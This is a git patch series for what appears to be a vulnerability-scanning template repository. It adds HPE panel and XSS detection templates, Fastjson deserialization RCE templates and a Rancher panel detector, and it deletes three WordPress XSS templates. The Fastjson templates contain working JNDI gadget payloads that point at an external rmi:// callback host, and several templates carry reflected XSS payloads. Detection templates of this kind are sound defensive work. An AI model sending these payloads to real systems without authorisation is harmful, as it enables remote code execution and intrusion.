b/exposed-panels/hpe-system-management-homepage-login.yaml deleted file mode 100644 index ed9c8af4e4..0000000000 --- a/exposed-panels/hpe-system-management-homepage-login.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: hpe-system-management-homepage-login - -info: - name: HPE System Management Homepage Login - author: divya_mudgal - severity: info - tags: HPE-System-Management-Homepage,tech,panel - -requests: - - method: GET - path: - - "{{BaseURL}}/cpqlogin.htm" - - matchers-condition: and - matchers: - - type: word - words: - - "smhversion = \"HPE System Management Homepage " - - - type: word - words: - - "/proxy/ssllogin" - - extractors: - - type: regex - part: body - regex: - - "HPE System Management Homepage v([0-9-.]*)" diff --git a/exposed-panels/hpe-system-management-login.yaml b/exposed-panels/hpe-system-management-login.yaml new file mode 100644 index 0000000000..44da97515b --- /dev/null +++ b/exposed-panels/hpe-system-management-login.yaml @@ -0,0 +1,27 @@ +id: hpe-system-management-login + +info: + name: HPE System Management Login + author: divya_mudgal + severity: info + tags: hp,tech,panel + +requests: + - method: GET + path: + - "{{BaseURL}}/cpqlogin.htm" + + matchers-condition: and + matchers: + - type: word + condition: and + part: body + words: + - "HPE System Management Homepage" + - "/proxy/ssllogin" + + extractors: + - type: regex + part: body + regex: + - "HPE System Management Homepage v([0-9-.]*)" \ No newline at end of file From 2a6acf66e7143704e2b4f290bc667579bb60659e Mon Sep 17 00:00:00 2001 From: Divya <divya.mudgal92+github@gmail.com> Date: Tue, 12 Oct 2021 00:08:39 -0400 Subject: [PATCH 2859/4083] Add CVE-2017-12544.yaml Template for HPE System Management XSS (CVE-2017-12544) --- cves/2017/CVE-2017-12544.yaml | 35 +++++++++++++++++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 cves/2017/CVE-2017-12544.yaml diff --git a/cves/2017/CVE-2017-12544.yaml b/cves/2017/CVE-2017-12544.yaml new file mode 100644 index 0000000000..fafed80c54 --- /dev/null +++ b/cves/2017/CVE-2017-12544.yaml @@ -0,0 +1,35 @@ +id: CVE-2017-12544 + +info: + name: HPE System Management - XSS + author: divya_mudgal + severity: medium + reference: https://seclists.org/fulldisclosure/2018/Mar/5 + description: Reflected Cross-site scripting (XSS) on HPE System Management + tags: cve,cve2017,xss,hp,unauth + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2017-12544 + cwe-id: CWE-79 + +requests: + - method: GET + path: + - "{{BaseURL}}/gsearch.php.en?prod=';prompt`1`;//" + + matchers-condition: and + matchers: + - type: word + words: + - "'';prompt`1`;//';" + part: body + + - type: word + words: + - "text/html" + part: header + + - type: status + status: + - 200 \ No newline at end of file From 58e277f87d1dea234dce438b11f0703523105c9a Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Tue, 12 Oct 2021 10:30:56 +0530 Subject: [PATCH 2860/4083] Update CVE-2017-12544.yaml --- cves/2017/CVE-2017-12544.yaml | 12 +++++++----- 1 file changed, 7 insertions(+), 5 deletions(-) diff --git a/cves/2017/CVE-2017-12544.yaml b/cves/2017/CVE-2017-12544.yaml index fafed80c54..c6e8191672 100644 --- a/cves/2017/CVE-2017-12544.yaml +++ b/cves/2017/CVE-2017-12544.yaml @@ -4,25 +4,27 @@ info: name: HPE System Management - XSS author: divya_mudgal severity: medium - reference: https://seclists.org/fulldisclosure/2018/Mar/5 description: Reflected Cross-site scripting (XSS) on HPE System Management - tags: cve,cve2017,xss,hp,unauth + reference: + - https://seclists.org/fulldisclosure/2018/Mar/5 + - https://nvd.nist.gov/vuln/detail/CVE-2017-12544 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2017-12544 cwe-id: CWE-79 + tags: cve,cve2017,xss,hp requests: - method: GET path: - - "{{BaseURL}}/gsearch.php.en?prod=';prompt`1`;//" + - "{{BaseURL}}/gsearch.php.en?prod=';prompt`document.domain`;//" matchers-condition: and matchers: - type: word words: - - "'';prompt`1`;//';" + - "var prodName = '';prompt`document.domain`;//';" part: body - type: word @@ -32,4 +34,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 From 6e6601a46253fe4d4eb757444d844ba026306171 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Tue, 12 Oct 2021 11:27:50 +0530 Subject: [PATCH 2861/4083] more templates --- ...1224-rce.yaml => fastjson-1.2.24-rce.yaml} | 16 +++++- .../fastjson/fastjson-1.2.41-rce.yaml | 30 +++++++++++ .../fastjson/fastjson-1.2.42-rce.yaml | 30 +++++++++++ .../fastjson/fastjson-1.2.43-rce.yaml | 30 +++++++++++ ...1247-rce.yaml => fastjson-1.2.47-rce.yaml} | 3 +- .../fastjson/fastjson-1.2.62-rce.yaml | 29 +++++++++++ .../fastjson/fastjson-1.2.67-rce.yaml | 32 ++++++++++++ .../fastjson/fastjson-1.2.68-rce.yaml | 50 +++++++++++++++++++ 8 files changed, 217 insertions(+), 3 deletions(-) rename vulnerabilities/fastjson/{fastjson-1224-rce.yaml => fastjson-1.2.24-rce.yaml} (65%) create mode 100644 vulnerabilities/fastjson/fastjson-1.2.41-rce.yaml create mode 100644 vulnerabilities/fastjson/fastjson-1.2.42-rce.yaml create mode 100644 vulnerabilities/fastjson/fastjson-1.2.43-rce.yaml rename vulnerabilities/fastjson/{fastjson-1247-rce.yaml => fastjson-1.2.47-rce.yaml} (88%) create mode 100644 vulnerabilities/fastjson/fastjson-1.2.62-rce.yaml create mode 100644 vulnerabilities/fastjson/fastjson-1.2.67-rce.yaml create mode 100644 vulnerabilities/fastjson/fastjson-1.2.68-rce.yaml diff --git a/vulnerabilities/fastjson/fastjson-1224-rce.yaml b/vulnerabilities/fastjson/fastjson-1.2.24-rce.yaml similarity index 65% rename from vulnerabilities/fastjson/fastjson-1224-rce.yaml rename to vulnerabilities/fastjson/fastjson-1.2.24-rce.yaml index 684f4da37f..bd5dfbb3f3 100644 --- a/vulnerabilities/fastjson/fastjson-1224-rce.yaml +++ b/vulnerabilities/fastjson/fastjson-1.2.24-rce.yaml @@ -7,7 +7,7 @@ info: reference: - https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.24-rce - https://www.freebuf.com/vuls/208339.html - - http://xxlegend.com/2017/04/29/title-%20fastjson%20%E8%BF%9C%E7%A8%8B%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96poc%E7%9A%84%E6%9E%84%E9%80%A0%E5%92%8C%E5%88%86%E6%9E%90/ + - https://github.com/wyzxxz/fastjson_rce_tool tags: fastjson,rce,deserialization requests: @@ -25,10 +25,22 @@ requests: } } + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + { + "@type":"com.sun.rowset.JdbcRowSetImpl", + "dataSourceName":"rmi://{{interactsh-url}}/Exploit", + "autoCommit":true + } + + stop-at-first-match: true matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms DNS Interaction + part: interactsh_protocol # Confirms DNS Interaction words: - "dns" diff --git a/vulnerabilities/fastjson/fastjson-1.2.41-rce.yaml b/vulnerabilities/fastjson/fastjson-1.2.41-rce.yaml new file mode 100644 index 0000000000..2b5d188b38 --- /dev/null +++ b/vulnerabilities/fastjson/fastjson-1.2.41-rce.yaml @@ -0,0 +1,30 @@ +id: fastjson-1.2.41-rce + +info: + name: Fastjson 1.2.41 Deserialization RCE + author: zh + severity: critical + reference: + - https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson + - https://github.com/wyzxxz/fastjson_rce_tool + tags: fastjson,rce,deserialization + +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + { + "@type":"Lcom.sun.rowset.JdbcRowSetImpl", + "dataSourceName":"rmi://{{interactsh-url}}/Exploit", + "autoCommit":true + } + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms DNS Interaction + words: + - "dns" \ No newline at end of file diff --git a/vulnerabilities/fastjson/fastjson-1.2.42-rce.yaml b/vulnerabilities/fastjson/fastjson-1.2.42-rce.yaml new file mode 100644 index 0000000000..7dfbe5a9f1 --- /dev/null +++ b/vulnerabilities/fastjson/fastjson-1.2.42-rce.yaml @@ -0,0 +1,30 @@ +id: fastjson-1.2.42-rce + +info: + name: Fastjson 1.2.42 Deserialization RCE + author: zh + severity: critical + reference: + - https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson + - https://github.com/wyzxxz/fastjson_rce_tool + tags: fastjson,rce,deserialization + +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + { + "@type":"LL\u0063\u006f\u006d.sun.rowset.JdbcRowSetImpl;;", + "dataSourceName":"rmi://{{interactsh-url}}/Exploit", + "autoCommit":true + } + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms DNS Interaction + words: + - "dns" \ No newline at end of file diff --git a/vulnerabilities/fastjson/fastjson-1.2.43-rce.yaml b/vulnerabilities/fastjson/fastjson-1.2.43-rce.yaml new file mode 100644 index 0000000000..f0bef43a71 --- /dev/null +++ b/vulnerabilities/fastjson/fastjson-1.2.43-rce.yaml @@ -0,0 +1,30 @@ +id: fastjson-1.2.43-rce + +info: + name: Fastjson 1.2.43 Deserialization RCE + author: zh + severity: critical + reference: + - https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson + - https://github.com/wyzxxz/fastjson_rce_tool + tags: fastjson,rce,deserialization + +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + { + "@type":"com.sun.rowset.JdbcRowSetImpl", + "dataSourceName":"rmi://{{interactsh-url}}/Exploit", + "autoCommit":true + } + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms DNS Interaction + words: + - "dns" \ No newline at end of file diff --git a/vulnerabilities/fastjson/fastjson-1247-rce.yaml b/vulnerabilities/fastjson/fastjson-1.2.47-rce.yaml similarity index 88% rename from vulnerabilities/fastjson/fastjson-1247-rce.yaml rename to vulnerabilities/fastjson/fastjson-1.2.47-rce.yaml index 5339bb04b7..8805168f29 100644 --- a/vulnerabilities/fastjson/fastjson-1247-rce.yaml +++ b/vulnerabilities/fastjson/fastjson-1.2.47-rce.yaml @@ -8,6 +8,7 @@ info: - https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.47-rce - https://www.freebuf.com/vuls/208339.html - https://cert.360.cn/warning/detail?id=7240aeab581c6dc2c9c5350756079955 + - https://github.com/wyzxxz/fastjson_rce_tool tags: fastjson,rce,deserialization requests: @@ -32,7 +33,7 @@ requests: matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms DNS Interaction + part: interactsh_protocol # Confirms DNS Interaction words: - "dns" diff --git a/vulnerabilities/fastjson/fastjson-1.2.62-rce.yaml b/vulnerabilities/fastjson/fastjson-1.2.62-rce.yaml new file mode 100644 index 0000000000..9238020f4d --- /dev/null +++ b/vulnerabilities/fastjson/fastjson-1.2.62-rce.yaml @@ -0,0 +1,29 @@ +id: fastjson-1.2.62-rce + +info: + name: Fastjson 1.2.62 Deserialization RCE + author: zh + severity: critical + reference: + - https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson + - https://github.com/wyzxxz/fastjson_rce_tool + tags: fastjson,rce,deserialization + +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + { + "@type":"org.apache.xbean.propertyeditor.JndiConverter", + "AsText":"rmi://{{interactsh-url}}/exploit" + } + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms DNS Interaction + words: + - "dns" \ No newline at end of file diff --git a/vulnerabilities/fastjson/fastjson-1.2.67-rce.yaml b/vulnerabilities/fastjson/fastjson-1.2.67-rce.yaml new file mode 100644 index 0000000000..0d7a66e618 --- /dev/null +++ b/vulnerabilities/fastjson/fastjson-1.2.67-rce.yaml @@ -0,0 +1,32 @@ +id: fastjson-1.2.67-rce + +info: + name: Fastjson 1.2.67 Deserialization RCE + author: zh + severity: critical + reference: + - https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson + - https://github.com/wyzxxz/fastjson_rce_tool + tags: fastjson,rce,deserialization + +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + { + "@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig", + "properties":{ + "@type":"java.util.Properties", + "UserTransaction":"rmi://{{interactsh-url}}/Exploit" + } + } + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms DNS Interaction + words: + - "dns" \ No newline at end of file diff --git a/vulnerabilities/fastjson/fastjson-1.2.68-rce.yaml b/vulnerabilities/fastjson/fastjson-1.2.68-rce.yaml new file mode 100644 index 0000000000..4f7a03128c --- /dev/null +++ b/vulnerabilities/fastjson/fastjson-1.2.68-rce.yaml @@ -0,0 +1,50 @@ +id: fastjson-1.2.68-rce + +info: + name: Fastjson 1.2.68 Deserialization RCE + author: zh + severity: critical + reference: + - https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson + - https://github.com/wyzxxz/fastjson_rce_tool + tags: fastjson,rce,deserialization + +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + { + "@type":"org.apache.shiro.jndi.JndiObjectFactory", + "resourceName":"rmi://{{interactsh-url}}/Exploit" + } + + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + { + "@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup", + "jndiNames":"rmi://{{interactsh-url}}/Exploit" + } + + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + { + "@type":"br.com.anteros.dbcp.AnterosDBCPConfig", + "metricRegistry":"rmi:/{{interactsh-url}}/Exploit" + } + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms DNS Interaction + words: + - "dns" \ No newline at end of file From 9d1f7fb62727c478d0e54d95db25f90ac0fb2195 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Tue, 12 Oct 2021 11:28:49 +0530 Subject: [PATCH 2862/4083] more tags --- vulnerabilities/fastjson/fastjson-1.2.24-rce.yaml | 2 +- vulnerabilities/fastjson/fastjson-1.2.41-rce.yaml | 2 +- vulnerabilities/fastjson/fastjson-1.2.42-rce.yaml | 2 +- vulnerabilities/fastjson/fastjson-1.2.43-rce.yaml | 2 +- vulnerabilities/fastjson/fastjson-1.2.47-rce.yaml | 2 +- vulnerabilities/fastjson/fastjson-1.2.62-rce.yaml | 2 +- vulnerabilities/fastjson/fastjson-1.2.67-rce.yaml | 2 +- vulnerabilities/fastjson/fastjson-1.2.68-rce.yaml | 2 +- 8 files changed, 8 insertions(+), 8 deletions(-) diff --git a/vulnerabilities/fastjson/fastjson-1.2.24-rce.yaml b/vulnerabilities/fastjson/fastjson-1.2.24-rce.yaml index bd5dfbb3f3..864e73e8dd 100644 --- a/vulnerabilities/fastjson/fastjson-1.2.24-rce.yaml +++ b/vulnerabilities/fastjson/fastjson-1.2.24-rce.yaml @@ -8,7 +8,7 @@ info: - https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.24-rce - https://www.freebuf.com/vuls/208339.html - https://github.com/wyzxxz/fastjson_rce_tool - tags: fastjson,rce,deserialization + tags: fastjson,rce,deserialization,oob requests: - raw: diff --git a/vulnerabilities/fastjson/fastjson-1.2.41-rce.yaml b/vulnerabilities/fastjson/fastjson-1.2.41-rce.yaml index 2b5d188b38..853a41044d 100644 --- a/vulnerabilities/fastjson/fastjson-1.2.41-rce.yaml +++ b/vulnerabilities/fastjson/fastjson-1.2.41-rce.yaml @@ -7,7 +7,7 @@ info: reference: - https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson - https://github.com/wyzxxz/fastjson_rce_tool - tags: fastjson,rce,deserialization + tags: fastjson,rce,deserialization,oob requests: - raw: diff --git a/vulnerabilities/fastjson/fastjson-1.2.42-rce.yaml b/vulnerabilities/fastjson/fastjson-1.2.42-rce.yaml index 7dfbe5a9f1..60a78d91ce 100644 --- a/vulnerabilities/fastjson/fastjson-1.2.42-rce.yaml +++ b/vulnerabilities/fastjson/fastjson-1.2.42-rce.yaml @@ -7,7 +7,7 @@ info: reference: - https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson - https://github.com/wyzxxz/fastjson_rce_tool - tags: fastjson,rce,deserialization + tags: fastjson,rce,deserialization,oob requests: - raw: diff --git a/vulnerabilities/fastjson/fastjson-1.2.43-rce.yaml b/vulnerabilities/fastjson/fastjson-1.2.43-rce.yaml index f0bef43a71..9ae91884ea 100644 --- a/vulnerabilities/fastjson/fastjson-1.2.43-rce.yaml +++ b/vulnerabilities/fastjson/fastjson-1.2.43-rce.yaml @@ -7,7 +7,7 @@ info: reference: - https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson - https://github.com/wyzxxz/fastjson_rce_tool - tags: fastjson,rce,deserialization + tags: fastjson,rce,deserialization,oob requests: - raw: diff --git a/vulnerabilities/fastjson/fastjson-1.2.47-rce.yaml b/vulnerabilities/fastjson/fastjson-1.2.47-rce.yaml index 8805168f29..e8428e5e15 100644 --- a/vulnerabilities/fastjson/fastjson-1.2.47-rce.yaml +++ b/vulnerabilities/fastjson/fastjson-1.2.47-rce.yaml @@ -9,7 +9,7 @@ info: - https://www.freebuf.com/vuls/208339.html - https://cert.360.cn/warning/detail?id=7240aeab581c6dc2c9c5350756079955 - https://github.com/wyzxxz/fastjson_rce_tool - tags: fastjson,rce,deserialization + tags: fastjson,rce,deserialization,oob requests: - raw: diff --git a/vulnerabilities/fastjson/fastjson-1.2.62-rce.yaml b/vulnerabilities/fastjson/fastjson-1.2.62-rce.yaml index 9238020f4d..62fd898293 100644 --- a/vulnerabilities/fastjson/fastjson-1.2.62-rce.yaml +++ b/vulnerabilities/fastjson/fastjson-1.2.62-rce.yaml @@ -7,7 +7,7 @@ info: reference: - https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson - https://github.com/wyzxxz/fastjson_rce_tool - tags: fastjson,rce,deserialization + tags: fastjson,rce,deserialization,oob requests: - raw: diff --git a/vulnerabilities/fastjson/fastjson-1.2.67-rce.yaml b/vulnerabilities/fastjson/fastjson-1.2.67-rce.yaml index 0d7a66e618..84e1e56a7a 100644 --- a/vulnerabilities/fastjson/fastjson-1.2.67-rce.yaml +++ b/vulnerabilities/fastjson/fastjson-1.2.67-rce.yaml @@ -7,7 +7,7 @@ info: reference: - https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson - https://github.com/wyzxxz/fastjson_rce_tool - tags: fastjson,rce,deserialization + tags: fastjson,rce,deserialization,oob requests: - raw: diff --git a/vulnerabilities/fastjson/fastjson-1.2.68-rce.yaml b/vulnerabilities/fastjson/fastjson-1.2.68-rce.yaml index 4f7a03128c..4018e1542a 100644 --- a/vulnerabilities/fastjson/fastjson-1.2.68-rce.yaml +++ b/vulnerabilities/fastjson/fastjson-1.2.68-rce.yaml @@ -7,7 +7,7 @@ info: reference: - https://github.com/tdtc7/qps/tree/4042cf76a969ccded5b30f0669f67c9e58d1cfd2/Fastjson - https://github.com/wyzxxz/fastjson_rce_tool - tags: fastjson,rce,deserialization + tags: fastjson,rce,deserialization,oob requests: - raw: From dc2d9485a9e2afcef10f091b918eca6df04ce19c Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Tue, 12 Oct 2021 12:07:05 +0530 Subject: [PATCH 2863/4083] additional matcher --- vulnerabilities/fastjson/fastjson-1.2.41-rce.yaml | 7 ++++++- vulnerabilities/fastjson/fastjson-1.2.42-rce.yaml | 7 ++++++- vulnerabilities/fastjson/fastjson-1.2.43-rce.yaml | 7 ++++++- vulnerabilities/fastjson/fastjson-1.2.62-rce.yaml | 7 ++++++- vulnerabilities/fastjson/fastjson-1.2.67-rce.yaml | 7 ++++++- vulnerabilities/fastjson/fastjson-1.2.68-rce.yaml | 7 ++++++- 6 files changed, 36 insertions(+), 6 deletions(-) diff --git a/vulnerabilities/fastjson/fastjson-1.2.41-rce.yaml b/vulnerabilities/fastjson/fastjson-1.2.41-rce.yaml index 853a41044d..d0e75c825e 100644 --- a/vulnerabilities/fastjson/fastjson-1.2.41-rce.yaml +++ b/vulnerabilities/fastjson/fastjson-1.2.41-rce.yaml @@ -27,4 +27,9 @@ requests: - type: word part: interactsh_protocol # Confirms DNS Interaction words: - - "dns" \ No newline at end of file + - "dns" + + - type: status + negative: true + status: + - 200 \ No newline at end of file diff --git a/vulnerabilities/fastjson/fastjson-1.2.42-rce.yaml b/vulnerabilities/fastjson/fastjson-1.2.42-rce.yaml index 60a78d91ce..9fb159c5ff 100644 --- a/vulnerabilities/fastjson/fastjson-1.2.42-rce.yaml +++ b/vulnerabilities/fastjson/fastjson-1.2.42-rce.yaml @@ -27,4 +27,9 @@ requests: - type: word part: interactsh_protocol # Confirms DNS Interaction words: - - "dns" \ No newline at end of file + - "dns" + + - type: status + negative: true + status: + - 200 \ No newline at end of file diff --git a/vulnerabilities/fastjson/fastjson-1.2.43-rce.yaml b/vulnerabilities/fastjson/fastjson-1.2.43-rce.yaml index 9ae91884ea..ea9499ce58 100644 --- a/vulnerabilities/fastjson/fastjson-1.2.43-rce.yaml +++ b/vulnerabilities/fastjson/fastjson-1.2.43-rce.yaml @@ -27,4 +27,9 @@ requests: - type: word part: interactsh_protocol # Confirms DNS Interaction words: - - "dns" \ No newline at end of file + - "dns" + + - type: status + negative: true + status: + - 200 \ No newline at end of file diff --git a/vulnerabilities/fastjson/fastjson-1.2.62-rce.yaml b/vulnerabilities/fastjson/fastjson-1.2.62-rce.yaml index 62fd898293..8afbf260fd 100644 --- a/vulnerabilities/fastjson/fastjson-1.2.62-rce.yaml +++ b/vulnerabilities/fastjson/fastjson-1.2.62-rce.yaml @@ -26,4 +26,9 @@ requests: - type: word part: interactsh_protocol # Confirms DNS Interaction words: - - "dns" \ No newline at end of file + - "dns" + + - type: status + negative: true + status: + - 200 \ No newline at end of file diff --git a/vulnerabilities/fastjson/fastjson-1.2.67-rce.yaml b/vulnerabilities/fastjson/fastjson-1.2.67-rce.yaml index 84e1e56a7a..28f6c5d5cd 100644 --- a/vulnerabilities/fastjson/fastjson-1.2.67-rce.yaml +++ b/vulnerabilities/fastjson/fastjson-1.2.67-rce.yaml @@ -29,4 +29,9 @@ requests: - type: word part: interactsh_protocol # Confirms DNS Interaction words: - - "dns" \ No newline at end of file + - "dns" + + - type: status + negative: true + status: + - 200 \ No newline at end of file diff --git a/vulnerabilities/fastjson/fastjson-1.2.68-rce.yaml b/vulnerabilities/fastjson/fastjson-1.2.68-rce.yaml index 4018e1542a..49ef2c1de0 100644 --- a/vulnerabilities/fastjson/fastjson-1.2.68-rce.yaml +++ b/vulnerabilities/fastjson/fastjson-1.2.68-rce.yaml @@ -47,4 +47,9 @@ requests: - type: word part: interactsh_protocol # Confirms DNS Interaction words: - - "dns" \ No newline at end of file + - "dns" + + - type: status + negative: true + status: + - 200 \ No newline at end of file From fca8435d9e35444abcf33e5058ccf6823bf31c07 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Tue, 12 Oct 2021 16:13:18 +0530 Subject: [PATCH 2864/4083] Create rancher-detect.yaml --- technologies/rancher-detect.yaml | 32 ++++++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 technologies/rancher-detect.yaml diff --git a/technologies/rancher-detect.yaml b/technologies/rancher-detect.yaml new file mode 100644 index 0000000000..47bf621f45 --- /dev/null +++ b/technologies/rancher-detect.yaml @@ -0,0 +1,32 @@ +id: rancher-detect + +info: + name: Rancher Detect + author: princechaddha + severity: info + tags: tech,rancher + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "<title>Loading…" + - "global-admin/config/environment" + condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - '' From 2ccbf99f967fa23f970d7df7dc81d4db238dadf1 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 12 Oct 2021 16:22:57 +0530 Subject: [PATCH 2865/4083] Update and rename technologies/rancher-detect.yaml to exposed-panels/rancher-panel.yaml --- .../rancher-panel.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) rename technologies/rancher-detect.yaml => exposed-panels/rancher-panel.yaml (84%) diff --git a/technologies/rancher-detect.yaml b/exposed-panels/rancher-panel.yaml similarity index 84% rename from technologies/rancher-detect.yaml rename to exposed-panels/rancher-panel.yaml index 47bf621f45..ecff09b49f 100644 --- a/technologies/rancher-detect.yaml +++ b/exposed-panels/rancher-panel.yaml @@ -1,10 +1,10 @@ -id: rancher-detect +id: rancher-panel info: - name: Rancher Detect + name: Rancher Login Panel author: princechaddha severity: info - tags: tech,rancher + tags: panel,rancher,kubernetes,devops,cloud requests: - method: GET From 3dce3d64365088948dad235817abc3c86a52b128 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 12 Oct 2021 16:26:35 +0530 Subject: [PATCH 2866/4083] Delete CVE-2021-20792.yaml --- cves/2021/CVE-2021-20792.yaml | 36 ----------------------------------- 1 file changed, 36 deletions(-) delete mode 100644 cves/2021/CVE-2021-20792.yaml diff --git a/cves/2021/CVE-2021-20792.yaml b/cves/2021/CVE-2021-20792.yaml deleted file mode 100644 index 2ac7c4927e..0000000000 --- a/cves/2021/CVE-2021-20792.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: CVE-2021-20792 - -info: - name: Quiz And Survey Master < 7.1.14 - Reflected Cross-Site Scripting - author: dhiyaneshDK - severity: medium - reference: - - https://wpscan.com/vulnerability/4deb3464-00ed-483b-8d91-f9dffe2d57cf - tags: wordpress,cve,cve2021,wp-plugin - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2021-20792 - cwe-id: CWE-79 - description: "Cross-site scripting vulnerability in Quiz And Survey Master versions prior to 7.1.14 allows a remote attacker to inject arbitrary script via unspecified vectors." - -requests: - - method: GET - path: - - '{{BaseURL}}/wp-admin/admin.php?page=mlw_quiz_list&s=">&paged=">' - - matchers-condition: and - matchers: - - type: word - words: - - '' - part: body - - - type: status - status: - - 200 - - - type: word - words: - - "text/html" - part: header From e0b21e62de65fdc4eaf6879d25d231359172f026 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 12 Oct 2021 16:26:53 +0530 Subject: [PATCH 2867/4083] Delete CVE-2021-24510.yaml --- cves/2021/CVE-2021-24510.yaml | 36 ----------------------------------- 1 file changed, 36 deletions(-) delete mode 100644 cves/2021/CVE-2021-24510.yaml diff --git a/cves/2021/CVE-2021-24510.yaml b/cves/2021/CVE-2021-24510.yaml deleted file mode 100644 index 20e0bb8774..0000000000 --- a/cves/2021/CVE-2021-24510.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: CVE-2021-24510 - -info: - name: MF Gig Calendar <= 1.1 - Reflected Cross-Site Scripting (XSS) - author: dhiyaneshDK - severity: medium - reference: - - https://wpscan.com/vulnerability/715721b0-13a1-413a-864d-2380f38ecd39 - tags: wordpress,cve,cve2021,wp-plugin - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2021-24510 - cwe-id: CWE-79 - description: "The MF Gig Calendar WordPress plugin through 1.1 does not sanitise or escape the id GET parameter before outputting back in the admin dashboard when editing an Event, leading to a reflected Cross-Site Scripting issue" - -requests: - - method: GET - path: - - '{{BaseURL}}/wp-admin/admin.php?page=mf_gig_calendar&action=edit&id="><"' - - matchers-condition: and - matchers: - - type: word - words: - - ' Date: Tue, 12 Oct 2021 16:27:09 +0530 Subject: [PATCH 2868/4083] Delete CVE-2021-34640.yaml --- cves/2021/CVE-2021-34640.yaml | 36 ----------------------------------- 1 file changed, 36 deletions(-) delete mode 100644 cves/2021/CVE-2021-34640.yaml diff --git a/cves/2021/CVE-2021-34640.yaml b/cves/2021/CVE-2021-34640.yaml deleted file mode 100644 index 86afe87aa6..0000000000 --- a/cves/2021/CVE-2021-34640.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: CVE-2021-34640 - -info: - name: Securimage-WP-Fixed <= 3.5.4 - Reflected Cross-Site Scripting (XSS) - author: dhiyaneshDK - severity: medium - reference: - - https://wpscan.com/vulnerability/22017067-8675-4884-b976-d7f5a71279d2 - tags: wordpress,cve,cve2021,wp-plugin - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2021-34640 - cwe-id: CWE-79 - description: "The Securimage-WP-Fixed WordPress plugin is vulnerable to Reflected Cross-Site Scripting due to the use of $_SERVER['PHP_SELF'] in the ~/securimage-wp.php file which allows attackers to inject arbitrary web scripts, in versions up to and including 3.5.4." - -requests: - - method: GET - path: - - '{{BaseURL}}/wp-admin/options-general.php/">/script%3E?page=securimage-wp-options%2F' - - matchers-condition: and - matchers: - - type: word - words: - - '' - part: 